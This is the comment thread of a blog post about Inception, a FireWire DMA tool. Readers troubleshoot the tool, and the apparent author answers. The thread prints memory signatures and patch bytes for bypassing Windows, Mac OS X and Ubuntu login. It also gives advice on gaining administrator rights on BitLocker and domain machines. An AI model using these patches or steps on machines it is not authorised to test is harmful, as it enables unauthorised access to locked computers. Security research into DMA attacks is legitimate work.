            I spent both last night and the whole day testing Inception without any luck. Tested on 3 laptops, both from life cd and hdd installed, all give the same (wrong) result “No firewire devices detected on the bus”. Obviously I am doing something wrong, but what?
            The ticket you suggested is opened. Thanks sofar.

  18. james

    Wow, please tell me I’ve found a tool to my problem – I forgotten my notebook (Win7 Bitlocker) adminstrator password and can only login now as a normal user. Can’t boot from usb or cd to run offline tools which won’t work anyway with bitlocker.

    Will I be able to use inception to allow me to login as administrator with any password and then proceed to reset it or alternatively create another admin account to save the day?

    • Carsten

      Yes – that should work (provided that I remember the bitlocker architecture correctly). I haven’t tested this, though.

      Just use ‘runas’ or ‘run as administrator’ to run the user management app after Inception is done patching.

  19. Alex

    I used your tool to crack my OS, I have a question tha the VT-d of Intel cannot protect the DMA attackers? Or, I am confused about why the IOMMU not defense to prevent such a attacker.

  20. Konrads

    On one Windows Vista machine, I get an error:
    The driver has detected a device with old or out-of-date firmware. The device will not be used.
    Event ID: 25
    EventData: \Device\Sbp2\Linux Firewire&UNKNOWN_MODEL&0&354fc000_0d4e3890_Instance00

    • Carsten

      Interesting. You don’t write anything about what happens on the client side though, can you fill out a detailed issue on github?

      • Konrads

        Just added an issue on github re Windows Vista. Let me know if you need more information.

  21. Zeliz

    Could you let this tool modify the kernel? the lib-pam is in the userspace, so pam based authentication is overwrite in userspace.

  22. Zeliz

    I want to dump the memory of a specif address region, my address is like 0xeb5f5499, so in your dump mode, I typed incept -d 0xeb5f5499, so I use in the right way? Because I don’t see what I want. Thanks

    • Carsten

      No, that’s not the right way. Use incept -h to get a description on how to use the dump mode. And remember that physical memory address != virtual memory address.

      • Zeliz

        Thanks! For now I want to use this tool modify a address, which I have already found in dump file. so how can I change the settings or other files to make this. I just need to modify this place, no matter what kind of, just change the location of signature to my place? In `settings`? Thanks!

        • Carsten

          I’ll add a mode where you can specify signature, patch and offset from the command line. Stand by for a new release in a week or so. If you are in a hurry you can modify

  23. Berklin

    I am not clear about the signature locations, because for ubuntu is:
    Offsets: 0xebd, 0xbaf, 0xa7f
    Signature: 0x83f81f89c774
    Patch: 0xbf00000000eb
    But when I got the result from attacking, it shows:
    Searching, 3368 MiB so far. Sample data read: 0x894424108d44
    Signature found at 0xd281dbaf (@page # 862237)
    Data written: 0x0xbf00000000eb
    Data read: 0x0xbf00000000eb

    for the `Sample data read` didn’t match to Signature, and for the Patch also didn’t match to the `Data written`, why?

    • Carsten

      The sample data read doesn’t match the signature because the tool only outputs data read every 128 page or so (that’s why it’s called a ‘sample’).

      The patch does match the data written in your example above, so I guess I’m not sure I know what your asking?

    • Carsten

      BackTrack doesn’t load FireWire drivers when you hotplug a device into the machine.

      Issue the following command:

      modprobe firewire-ohci firewire-sbp2

      in the terminal on your BT machine to load the drivers on the victim side into the kernel. Because of this, BT is also not vulnerable to the attack by default. Good on the people that configured BT – secure defaults is a good thing.

      If you still are having trouble, verify that the cable and interfaces actually work by connecting a real FW device (such as a hard drive) to both the victim and the host, using the same cable.

  24. etudiant404


    I am studying the DMA issue. Inception is a very good tool, thank’s a lot for this. I noticed it is also possible to do DMA attack with an old Ipod. I have one but I don’t manage to use it in the correct way…
    Any clues please ?

    Thank’s in advance !

    • Carsten

      I’ve experimented with the iPod option itself, the problem is that the iPodLinux ( / project is not that active anymore, it relies on the old linux firewire stack, and that 1-3G iPods with firewire are not easy to come by. The best I can do is to urge you to read the documentation on the iPodLinux site.

      Inception will not work on an iPod as it uses the new Linux JuJu FireWire stack (introduced in the 2.6.31 Linux kernel). You would have to use winlockpwn.

      • etudiant404


        Sorry for this late answer and thank’s for your quick answer. I will check out with winlockpwn. And if it doesn’t work due to the program is too old, I will use a laptop as a demo tool. The main point for me is to have a support to do some attack example for potential customers and doing this from an Ipod is more impressive and furtive than from another computer.

        However, thank’s again !

  25. Nickless

    Hi Carsten,

    great tool. I tested it a coule of times against a 12.04 victim and it worked well.
    But after a week or so it doesn’t work anymore! Nothing changed, same victim, same attacker, same cable. Tried different cables. Als booted victim machine in Windows.
    Also installed Backtrack 5R3 on attacker machine.
    I now always get the message:
    [!] FireWire modules do not seem to be loaded. Load them? [Y/n]: y
    [!] Could not initialize FireWire. Are the modules loaded into the kernel?
    [!] Attack unsuccessful

    lsmod | grep fire shows:
    firewire_ohci 40172 0
    firewire_core 56906 1 firewire_ohci
    crc_itu_t 12627 1 firewire_core

    If i unplug the cable and put it back in I get:
    [!] No FireWire devices detected on the bus
    [!] Attack unsuccessful

    Any idea what could be happening here?

    • Carsten

      Not really easy to say what this could be, I’ve never experienced this myself. I haven’t tested Inception with BT5R3 yet, so have that in mind.

      This sounds like an error on the host side of the connection. Have you tried to recompile and reinstall the libforensic1394 libraries? I would also have a look at what the command dmesg outputs before and after you plug/unplug the cable.

      I would also test that the FireWire interfaces on both sides (host and victim) still works. Good luck!

  26. sgh

    Awesome tool. Has anyone got this working over a Thunderbolt cable yet? I’m connecting a Mac Mini with BT5 to a retina MBP and pickpocket isn’t detecting the latter.

      • Carsten

        It works over Thunderbolt, kinda. You have to use a FireWire to Thunderbolt converter (available at the Apple store), as Thunderbolt to Thunderbolt won’t work (the tool is using FireWire DMA to gain access as of now).

        • sgh

          Interesting. I got the adapter, but still no success. Even more strange, rebooting with only FW plugged in (adapter-less) now yields “No FireWire devices detected on the bus/Attach unsuccessful” even though lspci detects the controller.

          • Carsten

            Does other modes than pickpocket work?

            Unfortunately, I’m unable to assist you with hardware issues as it is hard for me to debug remotely. If you find a bug, please submit to github after making absolutely sure it’s not a harware issue.

  27. void

    I’ve been unsuccesful in attacking Win7 x64 enterprise from BT5r3.
    Steps taken:
    Check BIOS on both machines to see if IEEE1394 port is enabled.
    Connected both laptops (HDD LED on victim machine goes flashing for a while, so it’s being recognised/installed it seems, also the ‘Device Manager’ screen refreshed itself a couple of times.
    Output on BT:
    [email protected]:~/Desktop/carmaa-inception-5e0426e# ./

    [+] Setting up the environment
    [-] ‘firewire-ohci’ mod already loaded – skipping
    [-] Directory ‘/pentest/forensics/IR’ already exists – skipping
    [+] Downloading & installing required files
    [-] ‘cmake’ already installed – skipping
    [-] ‘python3′ already installed – skipping
    [-] ‘libforensic1394-0.2.tar.gz’ already downloaded – skipping
    [+] Building ‘libforensic1394-0.2′ …
    [-] Directory ‘inception’ already exists – skipping
    [+] Launching inception

    _| _| _| _|_|_| _|_|_|_| _|_|_| _|_|_| _| _|_| _| _|
    _| _|_| _| _| _| _| _| _| _| _| _| _|_| _|
    _| _| _| _| _| _|_|_| _|_|_| _| _| _| _| _| _| _|
    _| _| _|_| _| _| _| _| _| _| _| _| _|_|
    _| _| _| _|_|_| _|_|_|_| _| _| _| _|_| _| _|

    v.0.1.4 (C) Carsten Maartmann-Moe 2012
    Download: | Twitter: @breaknenter

    [!] No FireWire devices detected on the bus
    [!] Attack unsuccessful

    [ 172.611925] firewire_ohci 0000:86:09.0: PCI INT A -> GSI 20 (level, low) -> IRQ 20
    [ 172.611931] firewire_ohci 0000:86:09.0: setting latency timer to 64
    [ 172.676377] firewire_ohci: Added fw-ohci device 0000:86:09.0, OHCI v1.10, 4 IR + 4 IT contexts, quirks 0x11
    [ 173.176134] firewire_core: created device fw0: GUID 5566778811223344, S400
    [ 174.808267] firewire_core: refreshed device fw0
    [ 177.028532] firewire_core: refreshed device fw0

    [email protected]:~/Desktop/carmaa-inception-5e0426e# lsmod |grep fire
    firewire_ohci 39964 0
    firewire_core 61165 1 firewire_ohci
    crc_itu_t 12579 1 firewire_core

    I’ve seen your comment that you didn’t test with BT5r3 yet, but perhaps I can help you assist in troubleshooting, let me know if you need more info/output.

    • Carsten

      I just tested inception from BT5R3 against two different machines running fully updated Win7 x64, both succeeded. This is likely a hardware problem, especially since you cannot see any other devices on the FW bus.

      What kind of FW cable are you using (4/6/9 pin)? Are you using an express card on the BT5 side?

      • void

        Thats odd, must be a hardware thing than.
        I’m using the 4 pins on both sides, I don’t know if that’s a problem?
        I heard someone say firewire has a cross cable thing like ethernet has, but I couldn’t find much about it.
        Just to be sure I don’t do anything wrong, could you do a step by step run down of how you successfully attacked?
        The problem with testing is that I don’t have any other firewire hardware, esspecially with 4 pins connector available :/
        Thanks for your time!

        • Carsten

          There’s nothing really much of a process for attacking:

          1. Attach host and victim
          2. Run the tool

          Unfortunately, I’m unable to assist you with hardware issues as it is hard for me to debug remotely. If you find a bug, please submit to github after making absolutely sure it’s not a harware issue. That includes testing your hardware with a FireWire device.

  28. Fu

    Hi Carsten
    It’s great tool. I tried your tool in Windows 7 32-bit machine it worked great.
    But when i tried it in Windows 7 64-bit machine it didn’t worked. I checked the signature for my operating system and updated tool. Program says that it found the signature and patched but i can’t logged in the system. I dumped the memory and see tool wrote memory really. I couldn’t solved the problem. Do you have any idea?

      • Fu

        msv1_o.dll version 6.1.7600.16385,
        Windows 7 Ultimate 64 bit,
        signatures 0x291, 0x2a8, 0x321, 0x2a2, 0x2a1, 0x6a2

        • Carsten

          Thanks, will look into it. This sounds like a false positive, have you tried to run the tool twice in a row (i.e., let the tool patch twice)?

          • Fu

            I run the tool almost thirteen times and finally it worked. it took really long time.
            do you have any idea about how this problem could be fixed?

          • Carsten

            You’ve got to give me a more detailed description than that. Please describe, in detail, the events that led to success. Did it patch every time? Did it get DMA? etc.

          • Fu

            Unfortunately it didn’t patch everytime. did it get DMA?? I didn’t understand what you mean. If it don’t get DMA, it will never work. Am I wrong?

          • Carsten

            Use the -v switch to see if you’re getting data (you should see sample bytes being displayed). You may not be getting DMA every time. Also, see the question above: How much RAM does your target have?

          • Carsten

            See the troubleshooting/caveat section above. The signature may be situated above 2 GB, which you may not be able to read.

  29. Fu

    Could the signatures be variable or something else? My trial on Windows 7 64 bit a little odd. I know the exact signature and offset.The tool sometimes works. But sometimes although searching through the all memory tool couldn’t find any sign. I run it more than one in a row but it didn’t give me a stable solution. I tried it in two different windows 7 64 bit systems (have different offsets). Am i doing something wrong? Could you suggest a solution about that?

  30. Thilaknath

    Hi Carsten ,I found this toll pretty much interesting and the way in which it penetrates the opponents system, can you please help me out on providing some study materials on how exactly inception manages to read the victims ram and over write it with the code .

    Thank you

  31. Igor

    I tried your script against Windows 7 x86 with 2GB RAM and Windows 7 x64 with 4 GB RAM and I was successfull. On the x64 machine altough the system was not usable after login in, every app crashed.

    Then I tried Mac Mini with Mac OS 10.7.2 and 4 GM RAM and Macbook Pro with Mac OS 10.7.2 with no luck. The script writes that the DMA shield is down, reads the whole 4 GB of memory but with no success. Any idea where may be the problem?

    • Carsten

      What servicepack? On what offset is the tool patching? Read the article above and post an issue on github.

      For the macs, use -v to see if you actually have DMA. Again, read the troubleshooting section above.

  32. AJ

    Hello! Great tool! Ran into a problem though!

    I got it to work. Was all happy about it. Then I turned off both my machines. Now having them powered up again and trying to do the same it does not work.

    As my Linux (Ubuntu 12.02 LTS) machine sees its firewire and having the drivers on my win 7 64-bit machine, same as yesterday, when I type incept it keeps telling me that there is no device detected. Also tried it on a second win vista pc but the same message. I have read all the above, FAQ and all but have not managed to get it working for a second time.

    Any relevant tips or suggestions are welcome!

  33. J3ster

    Curious if others have experience to share with regards to the two points below.

    – Does the DLL patching work when the victim machine has been hardened with renamed local admin accounts?

    – What about local Windows versions in different languages than English?

    Great tool.

    • Carsten

      The tool patches the authentication mechanism itself, what accounts you have on the system doesn’t matter, all accounts will be unlocked.

      Have only tried a Norwegian version of XP and that worked, language shouldn’t matter. If you find that it does, please submit a bug on github.

  34. Jesse

    I was wondering if Inception will be changed to look over 4gb of ram. As it gets more common to have more ram these days!?

    Nice tool btw. Iǘe learned a lot lately.. all for educational purposes! I am enjoying the knowledge!

    • Carsten

      The 4 GiB limit is not imposed by Inception, but by the fact that FireWire uses 32-bit addressing. There’s no way of getting around that limit using FireWire, unfortunately.

  35. Will

    Hello, I’m pretty new at this, and I’m getting the cable tomorrow, but I was wondering if I would be able to use this with a firewire and adapter to thunderbolt, from my macbook pro mid 2012 to a macbook air mid 2012 (only has thunderbolt). Once I connect the 2, I should be able to use this tool? Any help would be great, thank you in advance!

  36. samet


    I’ve tried it between windows 7 x64 SP1 (HP Elitebook 8460p && 8gb RAM) and Backtrack 5r3. However it does not work. I checked offset information with IDA and it’s truth. After searching memory (4096 mb), the program says that “attack unsuccessful and then Windows 7 freezes. It does not respond anything (even mouse does not work). What may the problem ?


    • Carsten

      See the troubleshooting section above.

      The DLLs that Inception patches in-memory may be located above 4 GiB in RAM, which is not accessible to FireWire. This is a known issue with x64 Windows 7 and up machines.

      If you want to test you could remove one of the memory modules and re-test with only 4 GiB of RAM.

      • Jeroen

        Typically it stops with the error message somewhere in between 60 – 80%. Same Setup works fine on other target systems.

  37. newf

    I am trying your tool in BackTrack 5. I followed the instruction above and none gave error. then when i run the tool it gave this error

    ImportError: No module named forensic1394.bus

    I copied libforensic1394 files into /usr/lib folder bu it didn’t solved my problem.
    Do you have any idea about this error?

    • Carsten

      Removed a small typo in the install instructions (‘../’). Make sure you’ve installed the pyhton3 bindings for the libforensic1394 library by going to the libforensic1394-0.2/python source directory and execute ‘sudo pyhton3 install’.

  38. Thilaknath

    Hi I have tried to use inception on the following configuration listed below

    firewire ( 4 pin cable)
    Target OS : Windows 7 with a 4gb ram,
    Host OS: Backtrack 5 v r3,
    i have installed libforensic library and python 3 binding but still after numerous efforts it displays the logo of inception and prints
    ATTACK UNSUCESSFULL, no firewire device found, but the cable seems to work fine ,
    i think the problem is backtrack OS is not able to detect the firewire port , can you please help me out

    • Carsten

      The tool works perfectly from BackTrack, that’s the OS I’m using all the time. Check your hardware, BIOS settings and cable.

  39. funguy

    Congratulation. Works perfect on Mac Book Pro 7 with running ubuntu 12.10 lts , 8gb ram, 64 bit)
    It reset the password of the screensaver on my home machine to anything.
    (also running ubuntu 12.10 lts , 3 gb ram, 32 bit)
    Great work. (not ironic)

    I strongly suggest you now help the community to fix this huge problem.
    Countermeasurer Ideas or suggestions would be a good help.

    • Carsten

      See linked resources above for countermeasures. I guess I disagree about the “hugeness” of the problem, but I agree that it is a problem that needs to be fixed.

  40. r


    How does inception patch memory ? isn’t there some page protection enforcement ?
    as far as I know, even if you use DMA you can’t bypass page protection mechanism :/

    Maybe you could explain the magic which is done behind the scenes ? (or refer to the code) ?

  41. Cote

    So the only way to protect against this is to disable FireWire in the bios for Desktop PCs? For a laptop, just disable PCMCIA/ExpressCards SDIO and Thunderbolt?

  42. Kurious

    Attack on Window 7 Enterprise 64bit machine with bitlocker appears to be successful. Firewire detected, attack reported as successful. However, no elevated rights, and can’t seem to log on with any password to obtain administrator rights. Only two local logon accounts available, with the Administrator account disabled. Only logon I have available is my domain logon with restricted rights. Any suggestions on how to gain administrator rights?

        • Carsten

          Maybe you could try to open a command shell as Administrator after running the tool (Right click cmd.exe -> Run as administrator)? You may have to disconnect from the network (e.g., the AD domain) to force a local check of the cached password as opposed to a full AD check.

  43. Fabi

    Quick question from a newbie: Would it also be possible to search for a file path in RAM and replace it with another file path? If yes, how would that work and could I do it using your -m switch?

    • Carsten

      You can search for anything that is loaded in memory. File paths may be loaded at different offsets within pages between re-boots, so you may have trouble locating them reliably without doing a sequential search, which will likely yield a lot of false positives. If the file path is hardcoded in a binary, it will be loaded at the same offset within a memory page each time, which will make it easier to locate it. That’s the way Inception works – it searches for signatures at pre-determined offsets within the memory pages.

      Take a look at inception/ for more on the way the signatures are structured.

  44. Fabi

    Ok I see. How would that work, I mean would it be difficult for me to modify inception in order to do that?

  45. skies

    I’ve noticed that inception freezes/bluescreens the windows target if shared memory for the graphic card is used as soon as inception touches the shared memory areas.
    Of course, that is not an inception problem and probably cannot be fixed, so I just wanted to let you know and ask for confirmation and maybe a note could be taken for others wondering why the target freezes.

  46. where can i buy phen375

    Hello there! I know this is kinda off topic however I’d figured I’d ask.
    Would you be interested in exchanging links or maybe guest writing
    a blog post or vice-versa? My site covers a lot of the same subjects as yours and
    I feel we could greatly benefit from each other.
    If you’re interested feel free to shoot me an email. I look forward to hearing from you! Great blog by the way!

  47. Erik Westrup

    How do you, in Linux, find where pam_authenticate() is usually placed in real memory? I’be been trying to pass a memory dump from fmem to strings etc. Running “nm -D /lib/i386-linux-gnu/ | grep authenticate” gives the internal lib offset, I believe.

    • Carsten

      You won’t be able to predict where it is placed in memory – but you can predict where within a single memory page certain parts of the code is loaded. To generate signatures for Inception you’ll have to reverse engineer the binary of the function you want to locate – e.g. the binary containing pam_authenticate() – and find the offset of the code you want to change.

  48. Max

    Hi Carsten , I m trying to install inseption on a osx and after install it when i try to run it i get this error:
    ImportError: cannot import name firewire

    Traceback (most recent call last):
    File “./incept”, line 27, in
    from inception import firewire, screenlock, memdump, pickpocket, cfg, util, term
    File “/opt/local/src/inception/inception/”, line 24, in
    from inception import firewire, cfg, sound, util, term
    ImportError: cannot import name firewire

    Thanks in advance for your help

    • Sebastian

      @Max: this means your forensic1394 packet is not installed properly. After building it go to /forensic1394/python dir and do a “sudo python3 install”

      osx installation instructions are pretty bad :(

  49. James

    Since you are able to use this to attack a machine with a Thunderbolt port by using a Thunderbolt / FW adapter, why would it not work using a Thunderbolt-Thunderbolt cable? It seems that the victim machine is already “speaking” Thunderbolt.

  50. crabbies

    Can this attack work if both machines only have express card slots? If so what cable would be used? Presume it would still work as still direct access?

  51. LipAir

    Hello i have install inception on IMac 10.8 and collegate with me Win7. Me Harddisk D: is closing with Bitlocker;

    Last login: Mon Feb 25 20:19:43 on ttys000
    /Users/LipAir/forensic1394/python/inception/forensic1394/python/inception/incept ; exit;
    LipAirs-iMac:~ LipAir$ /Users/LipAir/forensic1394/python/inception/forensic1394/python/inception/incept ; exit;
    Traceback (most recent call last):
    File “/Users/LipAir/forensic1394/python/inception/forensic1394/python/inception/incept”, line 27, in
    from inception import firewire, screenlock, memdump, pickpocket, cfg, util, term
    File “/Users/LipAir/forensic1394/python/inception/forensic1394/python/inception/inception/”, line 33, in
    from forensic1394.bus import Bus
    File “/Library/Frameworks/Python.framework/Versions/3.3/lib/python3.3/site-packages/forensic1394/”, line 1, in
    from .bus import Bus
    File “/Library/Frameworks/Python.framework/Versions/3.3/lib/python3.3/site-packages/forensic1394/”, line 25, in
    from forensic1394.functions import forensic1394_alloc, forensic1394_destroy, \
    File “/Library/Frameworks/Python.framework/Versions/3.3/lib/python3.3/site-packages/forensic1394/”, line 32, in
    raise ImportError

    can you help me??


  52. Frank Luo

    I have a laptop with BitLocker encrypted but lost the key, Is that possible for me to use Inception to get recovery key?

  53. Paul

    attacking windows 8 x64 failed. I analyzed the dumped memory of victim, the signature+offset seem match with the value of it’s weird… any hint?

  54. Josh

    Is there a way to use the tool to extract the entire 4GB memory region ? will that crash the target because of mapped PCI regions ?

  55. Ruslan

    Hello everyone.
    First of all thanks to Carsten for the great tool.
    The main reason of my post is addressed to the people, having troubles with “no firewire device found”.
    I have experimented with the tool long enough and found following:
    If you have fw in lspci, if you have firewire_ohci, firewire_spb2 in lsdev and still have no firewire device found – change the cable. 95% is a cable trouble, even if it worked just a day before. It sounds strange, but I have tripple-checked that fact, using several cables, connecting to three different PC’s with different fw cards – and I’m sure. The first my cable worked just fine for a week or so, but one day tool stops working, giving the annoying error. I have killed about four days, inspecting all kind of software reasons, cuz I thought it’s not a hardware. Then, at last I have tryed to change the cable – and it works for couple of times. It was a sad surprise, when the new cable stops working again. I have buyed three different cables and at last found the one, which works perfect. So, if you expecting troubles i suggest the very first thing – if you have possibility to use 6-pin to 6-pin cable – make or buy the 6-pin cable with only 4 pins connected: 3 to 5, 5 to 3, 4 to 6, and 6 to 4. 1 and 2 should not be connected. This is the only cable, that always works. Sorry for possible mistakes, i’m not native english speaker.

    • Carsten

      This is a very good point. I’ll create a link to the amazon products I know are working 100 % of the times for me.

      In my experience as well, the cable is at fault 95 % of the times.

  56. Fritz

    Hi, Inception seems not working booting Windows in “Safe Mode” (via F8). Working in Safe Mode would be an interesting feature, given that some device control management solutions are not configured or even don´t work in safe mode. Will there be an update so that Inception will work in safe mode as well?

    Thanks very much & kind regards!


  57. Jeroen

    Problem with MacOS 10.6.8. Log:

    [email protected]:/opt/inception# ./incept -v

    _| _| _| _|_|_| _|_|_|_| _|_|_| _|_|_| _| _|_| _| _|
    _| _|_| _| _| _| _| _| _| _| _| _| _|_| _|
    _| _| _| _| _| _|_|_| _|_|_| _| _| _| _| _| _| _|
    _| _| _|_| _| _| _| _| _| _| _| _| _|_|
    _| _| _| _|_|_| _|_|_|_| _| _| _| _|_| _| _|

    v.0.2.5 (C) Carsten Maartmann-Moe 2013
    Download: | Twitter: @breaknenter

    [*] FireWire devices on the bus (names may appear blank):
    [1] Vendor (ID): Apple Computer, Inc. (0xa27) | Product (ID): Macintosh (0xa)
    [*] Only one device present, device auto-selected as target
    [*] Selected device: Apple Computer, Inc.
    [*] Available targets (known signatures):
    [1] Windows 8: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
    [2] Windows 7: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
    [3] Windows Vista: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
    [4] Windows XP: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
    [5] Mac OS X: DirectoryService/OpenDirectory unlock/privilege escalation
    [6] Ubuntu: libpam unlock/privilege escalation
    [7] Linux Mint: libpam unlock/privilege escalation
    [?] Please select target (or enter ‘q’ to quit): 5
    [*] Selected target: Mac OS X: DirectoryService/OpenDirectory unlock/privilege escalation
    [*] The target module contains the following signatures:
    Versions: 10.6.4, 10.6.8, 10.7.3, 10.8.2
    Architectures: x86, x64

    Offsets: 0x7cf
    Signature: 0x41bff6c8ffff48c78588
    Patch: 0x41bf0000000048c78588
    Patch offset: 0x0

    Offsets: 0xbff
    Signature: 0x41bff6c8ffff
    Patch: 0x41bf00000000
    Patch offset: 0x0

    Offsets: 0x82f
    Signature: 0xc78580f6fffff6c8ffff
    Patch: 0xc78580f6ffff00000000
    Patch offset: 0x0

    Offsets: 0xfa7
    Signature: 0xfb689d8eb0231c04883c4785b415c415d415e415f5dc3
    Patch: 0x31dbffc3
    Patch offset: 0x0

    Offsets: 0x334
    Signature: 0x88d84883c4685b415c415d415e415f5d
    Patch: 0xb001
    Patch offset: 0x0
    [|] Initializing bus and enabling SBP-2, please wait 1 seconds or press Ctrl+C
    [*] DMA shields should be down by now. Attacking…
    [==> ] 309 MiB ( 8%) {000075b2498934fc}
    [*] Signature found at 0x13573bff in page no. 79219
    [!] Um, something went wrong: forensic1394_read_device_v: Bad I/O request size
    Traceback (most recent call last):
    File “./incept”, line 200, in main
    address, page = screenlock.attack(targets)
    File “/opt/inception/inception/”, line 303, in attack
    success, backup = patch(device, address, chunks)
    File “/opt/inception/inception/”, line 133, in patch
    backup =, cfg.PAGESIZE)
    File “/usr/local/lib/python3.2/dist-packages/forensic1394/”, line 48, in newf
    return f(self, *args, **kwargs)
    File “/usr/local/lib/python3.2/dist-packages/forensic1394/”, line 158, in read
    self._readreq(list(zip(addrs, lens)), buf)
    File “/usr/local/lib/python3.2/dist-packages/forensic1394/”, line 134, in _readreq
    forensic1394_read_device_v(self, creq, len(creq))
    File “/usr/local/lib/python3.2/dist-packages/forensic1394/”, line 61, in process_result
    raise IOError(err)
    IOError: forensic1394_read_device_v: Bad I/O request size
    [email protected]:/opt/inception#

  58. Jeroen

    Problem with pickpocket mode. Log:

    [email protected]:/opt/inception# ./incept -v –pickpocket

    _| _| _| _|_|_| _|_|_|_| _|_|_| _|_|_| _| _|_| _| _|
    _| _|_| _| _| _| _| _| _| _| _| _| _|_| _|
    _| _| _| _| _| _|_|_| _|_|_| _| _| _| _| _| _| _|
    _| _| _|_| _| _| _| _| _| _| _| _| _|_|
    _| _| _| _|_|_| _|_|_|_| _| _| _| _|_| _| _|

    v.0.2.5 (C) Carsten Maartmann-Moe 2013
    Download: | Twitter: @breaknenter

    [!] Um, something went wrong: ‘module’ object has no attribute ‘wrapper’
    Traceback (most recent call last):
    File “./incept”, line 198, in main
    File “/opt/inception/inception/”, line 37, in lurk
    s = ‘\n’.join(term.wrapper.wrap(‘[-] Lurking in the shrubbery ‘ +
    AttributeError: ‘module’ object has no attribute ‘wrapper’

    Fix: change line 37 in to:

    s = ‘\n[-] Lurking in the shrubbery, waiting for a device to connect, Ctrl-C to abort\r’

  59. Jeroen

    Problem with reading ~3+ GiB of memory. Happens in all modes. Inception aborts, target system may or may not freeze. Same problem on both Apple hw (tested on 10.6, 10.7. 10.8) and Windows PC (tested on 7 x64). Attacker is Ubuntu 12.04.02 LTS x64. Problem happen with both integrated and ExpressCard interface. Log:

    [email protected]:/opt/inception# ./incept -v –pickpocket

    _| _| _| _|_|_| _|_|_|_| _|_|_| _|_|_| _| _|_| _| _|
    _| _|_| _| _| _| _| _| _| _| _| _| _|_| _|
    _| _| _| _| _| _|_|_| _|_|_| _| _| _| _| _| _| _|
    _| _| _|_| _| _| _| _| _| _| _| _| _|_|
    _| _| _| _|_|_| _|_|_|_| _| _| _| _|_| _| _|

    v.0.2.5 (C) Carsten Maartmann-Moe 2013
    Download: | Twitter: @breaknenter

    [-] Lurking in the shrubbery, waiting for a device to connect, Ctrl-C to abort
    [*] FireWire device detected
    [*] Dumping from 0x100000 to 0x100000000, a total of 4095 MiB
    [*] FireWire devices on the bus (names may appear blank):
    [1] Vendor (ID): Apple Computer, Inc. (0xa27) | Product (ID): Macintosh (0xa)
    [*] Only one device present, device auto-selected as target
    [*] Selected device: Apple Computer, Inc.
    [-] Initializing bus and enabling SBP-2, please wait 1 seconds or press Ctrl+C
    [!] Um, something went wrong: forensic1394_read_device_v: I/O timeoutffffffffff}
    Traceback (most recent call last):
    File “./incept”, line 198, in main
    File “/opt/inception/inception/”, line 51, in lurk
    memdump.dump(start, end)
    File “/opt/inception/inception/”, line 81, in dump
    data =, requestsize)
    File “/usr/local/lib/python3.2/dist-packages/forensic1394/”, line 48, in newf
    return f(self, *args, **kwargs)
    File “/usr/local/lib/python3.2/dist-packages/forensic1394/”, line 158, in read
    self._readreq(list(zip(addrs, lens)), buf)
    File “/usr/local/lib/python3.2/dist-packages/forensic1394/”, line 134, in _readreq
    forensic1394_read_device_v(self, creq, len(creq))
    File “/usr/local/lib/python3.2/dist-packages/forensic1394/”, line 61, in process_result
    raise IOError(err)
    IOError: forensic1394_read_device_v: I/O timeout
    [email protected]:/opt/inception#

    Any clues about howto debug this issue? Tx!

  60. Tommy

    Hardware embedded encryption of drive much faster than OS encryption and prevents DMA. Did you know that the NSA just finished building a humungous new super Q-bit data crypto-analysis computer complex and that it just went online last September 2012 (Wired magazine article “Inside the Matrix” April-2012 issue). Mr Control Freak just used your American tax dollars to fund the electric anal probe to rape the world with. Our privacy is now finally completely F**ked to H**l. The saddest part of this is that I don’t think they’re smart enough to realize that this same technology will someday be used against them also.

  61. Georgy

    I’ve ordered the relevant FireWire pci-e card. While I’m waiting for it to arrive, could you tell me:
    Will this work running inception in a Debian 7 VM?
    Or does it need to run from the host?

  62. Mr Schmeg

    Is FireWire broken in Ubuntu now_ Having the same error on many machines Ubuntu 12.04 LTS, Mint etc …
    [email protected]:~/inception$ sudo ./incept

    _| _| _| _|_|_| _|_|_|_| _|_|_| _|_|_| _| _|_| _| _|
    _| _|_| _| _| _| _| _| _| _| _| _| _|_| _|
    _| _| _| _| _| _|_|_| _|_|_| _| _| _| _| _| _| _|
    _| _| _|_| _| _| _| _| _| _| _| _| _|_|
    _| _| _| _|_|_| _|_|_|_| _| _| _| _|_| _| _|

    v.0.2.5 (C) Carsten Maartmann-Moe 2013
    Download: | Twitter: @breaknenter

    [?] FireWire modules are not loaded (or insufficient privileges). Try loading
    them? [Y/n]:
    [!] Could not initialize FireWire. Are the modules loaded into the kernel?
    [!] Attack unsuccessful

  63. crackruckles

    just got your tool installed on my raspberry pi and that went fine, i have it attached to a usb to firewire cable but i get the error “firewire modules not loaded” any ideas?

  64. Binäre Optionen strategien

    I am really impressed with your writing skills and also with the layout on your blog.
    Is this a paid theme or did you modify it yourself?
    Either way keep up the excellent quality writing, it’s rare to see a great blog like
    this one today.

  65. Watzmann

    Awesome tool. It worked for me onto a Apple 10.8.4, attacking a Windows XP machine over 1394, with McAfee FW and encryption. Now I am able to recover my personal, private, data. Will donate. Thank you very much.

  66. Sam

    Hi, looks really interesting

    Can this be used to set up a serial console on linux systems to capture kernel panic stack traces?

    I want to do this on a machine that’s panicing every couple of days- it has no RS232 at all.

  67. Pooper

    Im a nice guy. This shit is making me suicidal. I dont get you people. im literally going to just give up on people and end this shit.. and i was on your side too

  68. Rena

    You’re on Hacker News. Better late than never?

    What a nice protocol Firewire is to just give you direct access to physical memory. So kind of it.

  69. Kurt H Hanssen

    Hi Carsten
    Talk with you today about issues with Macbook Air and Macbook Pro from 2012 and newer.

    Have tested the Inception against a whole bunch of Macbook Air/Pro, old one and new. When i came to machines newer than mid 2012, it is not possible to read anything from the memory at the target machine. Have tried both the patching method and the –pickpocket.

    As an attacker machine, i have tried both Ubuntu 12.10 installed on PC and Mac (not using virtualization).

    The newer Macbook Air/Pro only have Thunderbolt, but I’m using the original Apple Thunderbolt –> Firewire adapter.

    Have success on attacking an 2011 Macbook Air trough Thunderbolt w/adapter but not two different MB Air from 2012 and 2013 and a MB pro from mid 2012.

    On all target machines, the juju firewire stack shows up, even on the newer MB pro/Air, so, i know the machine is recognized. They are also recognized by Inception as Apple computers

    I think there must be some sort of shield on the newer MB pro/air.

    Have even tried to shadow the attacker machine behind a Thuderbolt disk, but with same result,
    forensic1394_read_device_v: I/O Timeout

    Have also tried the forensic1394 libraries manually trough Python3, and these machines are all identified, possible to attach but no reading. I thin i had one success on reading just a few kilobytes with some tweaking on start/length.

    • Carsten

      Hi Kurt. This is interesting. Would it be possible for me to get in touch with you to test this on your HW?

